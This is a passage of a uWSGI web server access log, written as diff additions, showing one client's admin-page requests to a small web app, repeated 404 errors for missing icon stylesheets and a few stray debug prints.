+Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2565/3520] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2566/3521] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2567/3522] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2568/3523] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2569/3524] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2570/3525] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2571/3526] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3527] 180.160.48.43 () {40 vars in 929 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2572/3528] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3529] 180.160.48.43 () {40 vars in 851 bytes} [Thu Jan 14 13:43:32 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3530] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3531] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +delete +[pid: 15176|app: 0|req: 2573/3532] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 13:43:40 2021] POST /admin-home/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2574/3533] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 13:43:40 2021] GET /admin-home/ => generated 20786 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2575/3534] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2576/3535] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2577/3536] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2578/3537] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2579/3538] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2580/3539] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2581/3540] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2582/3541] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2583/3542] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:41 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +zhiding +置顶 +[pid: 15176|app: 0|req: 2584/3543] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 13:43:45 2021] POST /admin-home/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2585/3544] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 13:43:45 2021] GET /admin-home/ => generated 20786 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2586/3545] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2587/3546] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2588/3547] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2589/3548] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2590/3549] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2591/3550] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2592/3551] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 60 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2593/3552] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2594/3553] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:46 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2595/3554] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:43:47 2021] GET /announcement/ => generated 11798 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2596/3555] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2597/3556] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2598/3557] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2599/3558] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2600/3559] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2601/3560] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2602/3561] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2603/3562] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2604/3563] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:48 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2606/3564] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 13:43:59 2021] GET /announcement/? => generated 11798 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2606/3565] 180.160.48.43 () {48 vars in 1029 bytes} [Thu Jan 14 13:43:59 2021] POST /announcement/ => generated 27 bytes in 30 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2607/3566] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2609/3567] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2610/3568] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2611/3569] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2612/3570] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2612/3571] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 45 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2613/3572] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2614/3573] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2615/3574] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:00 2021] GET /static/css/animate.css => generated 3513 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2616/3575] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 13:44:01 2021] GET /announcement/ => generated 12633 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2617/3576] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2618/3577] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2620/3579] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2621/3580] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2622/3581] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2619/3581] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2623/3582] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2624/3583] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2625/3584] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 40 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2626/3585] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 13:44:07 2021] POST /announcement/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2627/3586] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 13:44:07 2021] GET /announcement/ => generated 11798 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2628/3587] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2629/3588] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2630/3589] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2631/3590] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2632/3591] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2633/3592] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2634/3593] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2635/3594] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2636/3595] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:07 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2637/3596] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:44:08 2021] GET /kind-manage/ => generated 13023 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2638/3597] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2639/3598] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2640/3599] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2641/3600] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2642/3601] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:08 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2643/3602] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2644/3603] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2645/3604] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2646/3605] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2648/3606] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:44:16 2021] GET /kind-manage/? => generated 13965 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2648/3607] 180.160.48.43 () {48 vars in 1025 bytes} [Thu Jan 14 13:44:16 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2649/3608] 180.160.48.43 () {40 vars in 931 bytes} [Thu Jan 14 13:44:16 2021] GET /kind-manage/ => generated 13965 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2650/3609] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2651/3610] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2652/3611] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2653/3612] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2654/3613] 180.160.48.43 () {38 